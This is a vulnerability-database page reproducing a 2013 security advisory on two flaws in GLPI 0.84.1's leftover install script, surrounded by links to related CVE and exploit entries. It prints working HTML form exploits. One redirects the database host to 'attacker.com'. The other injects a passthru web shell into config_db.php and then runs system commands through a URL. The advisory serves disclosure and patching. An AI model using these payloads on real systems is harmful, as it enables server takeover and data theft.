Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23173
HistorySep 11, 2013 - 12:00 a.m.

Remote Code Execution in GLPI

2013-09-1100:00:00
High-Tech Bridge
www.htbridge.com
356

0.686 Medium

EPSS

Percentile

98.0%

JSON

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in GLPI, which can be exploited to bypass security restrictions and execute arbitrary PHP code with privileges of web server.

  1. Improper Access Control in GLPI
    The vulnerability exists due to insufficient access restrictions to the installation script β€œ/install/install.php”, which is present by default after application installation. A remote attacker can change application’s configuration, such as database host, forcing the application to connect to an external database and spoof information on the website, obtain access to sensitive information or simply cause a denial of service.
    Simple exploit below changes the database hostname to β€œattacker.com”, which forces the application to connect to a malicious database controlled by the attacker:
    <form action=β€œhttp://[host]/install/install.php” method=β€œpost” name=β€œmain”>
    <input type=β€œhidden” name=β€œinstall” value=β€œupdate_1”>
    <input type=β€œhidden” name=β€œdb_host” value=β€œattacker.com”>
    <input type=β€œsubmit” id=β€œbtn”>
    </form>

  2. Arbitrary PHP Code Injection in GLPI
    The vulnerability exists due to insufficient validation of user-supplied input passed to the β€œdb_host”, β€œdb_user”, β€œdb_pass”, and β€œdatabasename” HTTP POST parameters via β€œ/install/install.php” script [that is present by default after application installation] before writing data into β€œ/config_db.php” file. A remote attacker can inject and execute arbitrary PHP code on the vulnerable system.
    Simple exploit below injects β€œpassthru($_GET[β€˜cmd’])” PHP code into β€œconfig_db.php” file allowing a remote attacker to execute arbitrary system command with privileges of the web server:
    <form action=β€œhttp://[host]/install/install.php” method=β€œpost” name=β€œmain”>
    <input type=β€œhidden” name=β€œinstall” value=β€œupdate_1”>
    <input type=β€œhidden” name=β€œdb_host” value=β€œ'; } passthru($_GET[β€˜cmd’]); /*”>
    <input type=β€œsubmit” id=β€œbtn”>
    </form>
    After that attacker can access the web shell to execute system commands via the following URL:
    http://[host]/index.php?cmd=ls -la; id; pwd;

CPENameOperatorVersion
glpile0.84.1

Related

nessus 2
exploitpack 1
ubuntucve 1
securityvulns 2
cve 1
metasploit 1
cvelist 1
packetstorm 2
seebug 1
altlinux 2
prion 1
nvd 1
checkpoint_advisories 1
zdt 2
dsquare 1
fedora 1
exploitdb 2
openvas 1
mageia 1
nessus
nessus
Fedora 20 : glpi-0.84.2-1.fc20 (2013-18202)
2013-10-13 00:00:00
Mandriva Linux Security Advisory : glpi (MDVSA-2013:240)
2013-09-26 00:00:00
exploitpack
exploitpack
GLPI 0.84.1 - Multiple Vulnerabilities
2013-10-02 00:00:00
ubuntucve
ubuntucve
CVE-2013-5696
2013-09-23 00:00:00
securityvulns
securityvulns
Remote Code Execution in GLPI
2013-10-02 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2013-10-02 00:00:00
cve
cve
CVE-2013-5696
2022-10-03 16:14:54
metasploit
metasploit
GLPI install.php Remote Command Execution
2013-09-20 08:45:10
cvelist
cvelist
CVE-2013-5696
2022-10-03 16:14:54
packetstorm
packetstorm
GLPI install.php Remote Command Execution
2013-09-20 00:00:00
GLPI 0.84.1 Access Control / Code Injection
2013-10-02 00:00:00
seebug
seebug
GLPI install.php Remote Command Execution
2014-07-01 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 10 package glpi version 0.84.2-alt1
2013-09-20 00:00:00
Security fix for the ALT Linux 9 package glpi version 0.84.2-alt1
2013-09-20 00:00:00
prion
prion
Cross site request forgery (csrf)
2013-09-23 03:49:00
nvd
nvd
CVE-2013-5696
2013-09-23 03:49:27
checkpoint_advisories
checkpoint_advisories
GLPI install.php Remote Command Execution (CVE-2013-5696)
2013-12-29 00:00:00
zdt
zdt
GLPI install.php Remote Command Execution Vulnerability
2013-09-21 00:00:00
GLPI 0.84.1 - Multiple Vulnerabilities
2013-10-02 00:00:00
dsquare
dsquare
GLPI 0.84.1 RCE
2013-10-04 00:00:00
fedora
fedora
[SECURITY] Fedora 20 Update: glpi-0.84.2-1.fc20
2013-10-12 04:30:38
exploitdb
exploitdb
GLPI - &#039;install.php&#039; Remote Command Execution (Metasploit)
2013-09-23 00:00:00
GLPI 0.84.1 - Multiple Vulnerabilities
2013-10-02 00:00:00
openvas
openvas
Mageia: Security Advisory (MGASA-2013-0288)
2022-01-28 00:00:00
mageia
mageia
Updated glpi package fixes security vulnerabilities
2013-09-20 09:36:48

0.686 Medium

EPSS

Percentile

98.0%

JSON
Related for HTB23173
nessus2exploitpack1ubuntucve1securityvulns2cve1metasploit1cvelist1packetstorm2seebug1altlinux2prion1nvd1checkpoint_advisories1zdt2dsquare1fedora1exploitdb2openvas1mageia1